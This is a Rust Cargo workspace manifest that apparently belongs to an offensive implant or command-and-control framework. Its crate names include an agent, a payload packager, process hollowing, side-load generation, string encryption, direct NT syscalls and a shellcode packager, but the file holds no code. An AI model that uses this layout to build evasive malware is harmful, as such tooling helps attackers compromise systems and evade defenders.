[workspace]
resolver = "2"
members = [
    "agent",
    "console",
    "common",
    "optimizer",
    "module_loader",
    "launcher",
    "payload-packager",
    "dev-server",
    "builder",
    "orchestra-server",
    "plugins/hello_plugin",
    "keygen",
    "hollowing",
    "orchestra-side-load-gen",
    "string_crypt",
    "pe_resolve",
    "junk_macro",
    "code_transform",
    "code_transform_macro",
    "nt_syscall",
    "shellcode_packager",
]

[workspace.package]
version = "0.1.0"
edition = "2021"
license = "Apache-2.0"
repository = "https://github.com/example/orchestra"

[workspace.dependencies]
tokio = { version = "1.35", features = ["full"] }
serde = { version = "1.0", features = ["derive"] }
anyhow = "1.0"
thiserror = "1.0"
tracing = "0.1"
tracing-subscriber = "0.3"
rand = "0.8"
aes-gcm = "0.10"
sha2 = "0.10"
hkdf = "0.12"
base64 = "0.21"
reqwest = { version = "0.11", features = ["json", "stream"] }
clap = { version = "4.4", features = ["derive"] }
sysinfo = "0.30"
dialoguer = "0.11"
toml = "0.8"

[patch.crates-io]
x11cap = { path = "vendor/x11cap" }

[profile.release]
opt-level = "z"
lto = "fat"
codegen-units = 1
panic = "abort"
strip = true
debug = false
